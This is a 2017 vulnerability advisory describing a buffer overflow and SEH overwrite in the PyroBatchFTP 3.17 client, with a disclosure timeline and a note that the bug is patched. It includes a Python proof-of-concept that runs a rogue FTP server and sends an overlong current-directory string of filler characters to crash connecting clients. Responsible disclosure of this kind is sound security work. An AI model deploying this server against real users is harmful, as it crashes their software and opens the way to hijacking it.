Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)
Date Published: 04/10/2017
It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.
Description of Issue
A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. This vulnerability occurs after successfully connecting to an FTP server with a current directory string of longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack execution flow of the application.
The following proof of concept python script will initialise an FTP server on the host system.
Connecting to the FTP server using PyrobatchFTP will trigger the buffer overflow.
#!/usr/bin/python print "Pyro FTP Buffer Overflow (SEH) Server" #Author: Kevin McGuigan #Author Website: https://www.7elements.co.uk #Vendor Website: https://www.emtech.com import socket import sys buffer="A"*2292+ "B"*4+"C"*4+"D"*800 port = 21 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", port)) s.listen(5) print("[+] FTP server started on port: "+str(port)+"\r\n") except: print("[+] Failed to bind the server to port:"+str(port)+"\r\n") while True: conn, addr = s.accept() conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') print(conn.recv(1024)) conn.send("331 OK\r\n") print(conn.recv(1024)) conn.send('230 OK\r\n') print(conn.recv(1024)) conn.send('220 "'+buffer+'" is current directory\r\n')
This issue has been patched and the patch notes can be found here.
The latest version of PyroBatchFTP can be found on the EmTec website.
Reported – 16th September 2017
Vendor Response – 18th September 2017
Update Requested – 3rd October 2017
Vendor Response and Patch – 4th October 2017
Advisory Published – 4th October 2017